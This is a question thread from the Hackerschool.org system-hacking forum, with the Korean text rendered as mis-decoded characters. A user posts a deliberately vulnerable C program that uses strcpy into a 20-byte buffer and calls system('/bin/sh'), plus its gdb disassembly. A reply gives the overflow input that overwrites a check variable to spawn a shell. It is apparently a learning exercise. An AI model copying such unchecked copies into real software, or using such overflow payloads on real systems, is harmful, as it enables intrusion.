½Ã½ºÅÛ ÇØÅ·

 1574, 7/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   ewqqw
   gdb ºÐ¼® disas

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=1860 [º¹»ç]


#include<stdio.h>
#include<string.h>

int main(int argc, char* argv[]){
        int check1 = 0x200a0b00;
        int check2 = 0xaabbccdd;
        char buffer[20];
        strcpy(buffer, argv[1]);
        if(check2==0x11223344)
                if(check1==0x200a0b00)
                        system("/bin/sh");
}

End of assembler dump.
(gdb) disas main
Dump of assembler code for function main:
   0x0804844d <+0>:        push   %ebp
   0x0804844e <+1>:        mov    %esp,%ebp
   0x08048450 <+3>:        and    $0xfffffff0,%esp
   0x08048453 <+6>:        sub    $0x30,%esp
   0x08048456 <+9>:        movl   $0x200a0b00,0x2c(%esp)
   0x0804845e <+17>:        movl   $0xaabbccdd,0x28(%esp)
   0x08048466 <+25>:        mov    0xc(%ebp),%eax
   0x08048469 <+28>:        add    $0x4,%eax
   0x0804846c <+31>:        mov    (%eax),%eax
   0x0804846e <+33>:        mov    %eax,0x4(%esp)
   0x08048472 <+37>:        lea    0x14(%esp),%eax
   0x08048476 <+41>:        mov    %eax,(%esp)
   0x08048479 <+44>:        call   0x8048310 <strcpy@plt>
   0x0804847e <+49>:        cmpl   $0x11223344,0x28(%esp)
   0x08048486 <+57>:        jne    0x804849e <main+81>
   0x08048488 <+59>:        cmpl   $0x200a0b00,0x2c(%esp)
   0x08048490 <+67>:        jne    0x804849e <main+81>
   0x08048492 <+69>:        movl   $0x8048530,(%esp)
   0x08048499 <+76>:        call   0x8048320 <system@plt>
   0x0804849e <+81>:        leave  
   0x0804849f <+82>:        ret    
End of assembler dump.

¿©±â¿¡¼­ ¾î¶»°Ô Çؾߵɱî¿ä..... buffer°¡ 20¹ÙÀÌÆ®°¡ ¾Æ´Ò ¼öµµ ÀÖ´Ù´Ï..
  Hit : 2122     Date : 2017/04/16 06:37


    
ÇØÄð·¯ buffer 20¹ÙÀÌÆ® ¸Â³×¿ä 2017/04/16  
ewqqw ÇØ°áµÇ¾ú½À´Ï´Ù~~ °¨»çµå·Á¿ä 2017/04/16  
ÇØÄð·¯ ¾Æ ÀÌÀü±ÛÀ» ´Ù½Ãº¸´Ï±î ÀÌ°Å Ä¡¼ÌÀ»¶§ ¿¡·¯³ª¼ÌÀ»°Í°°Àºµ¥¿ä?
./BOF1 AAAAAAAAAAAAAAAAAAAA`perl -e 'print "\x44\x33\x22\x11"'`
ÀÌ·¸°Ô ´Ù½ÃÇغ¸¼¼¿ä		 2017/04/16  
ÇØÄð·¯ ¾Æ ´ñ±Û¾²´Â»çÀÌ¿¡ ÀÌ¹Ì ÇØ°áµÆ´Ù°í ¾²¼Ì²Û¿ä ¤»¤» 2017/04/16  
ewqqw ³Ü ¤¾¤¾ 2017/04/16  
1454   ¹öÆÛ¿À¹öÇÃ·Î¿ì °ü·Ã Áú¹®..[1]     ewqqw
 04/17 2319
1453   ubuntu 16.04 UAF¹ö±×..[10]     vngkv123
 04/16 3096
  gdb ºÐ¼® disas[5]     ewqqw
 04/16 2121
1451   pwntools ¸¦ ÀÌ¿ëÇÑ Àͽº Áú¹®[6]     tkakr7458
 04/16 7233
1450   ¹öÆÛ¿À¹öÇ÷οì Áú¹®....[2]     ewqqw
 04/16 2272
1449   IDA¿¡¼­ ¼Ò½ºÄڵ带 º¹¿øÇßÀ»¶§[5]     vngkv123
 04/13 3516
1448   aslr ȯ°æ¿¡¼­...[2]     vngkv123
 04/12 2517
1447   asis CTF ¹®Á¦Ç®´Ù°¡....[4]     vngkv123
 04/12 2232
1446   pwnable kr OTP¹®Á¦...[2]     vngkv123
 04/09 2755
1445   64bit elfÆÄÀÏ µð¹ö±ë½Ã[6]     vngkv123
 04/08 2485
1444   gdb¿¡¼­...[2]     vngkv123
 04/05 2140
1443   ¹®Á¦ ¹æÇ⼺...[11]     vngkv123
 04/04 2404
1442   2013 plaid ctf rop ..[14]     vngkv123
 04/02 2454
1441   python Æä1À̷εå ÀÛ¼º½Ã[1]     vngkv123
 04/02 1894
1440   ¿ë¾îµé Áú¹®..[6]     vngkv123
 04/01 2338
1439   strippedµÈ ¹ÙÀ̳ʸ®ÆÄÀÏÀ» µð¹ö±ëÇÒ¶§...[5]     vngkv123
 04/01 2511
1438   fc10 fc14...[1]     vngkv123
 04/01 2043
1437   gdb¿¡¼­ callÀÌÈÄ ºê·¹ÀÌÅ©¸¦ °É¾úÀ»¶§..[10]     vngkv123
 03/31 2003
1436   ¸®ÅÏ°ú °ü·ÃÇÑ Áú¹®....[9]     vngkv123
 03/30 1938
1435   rop gadgetãÀ» ¶§....[1]     vngkv123
 03/30 2111
[1][2][3][4][5][6] 7 [8][9][10]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org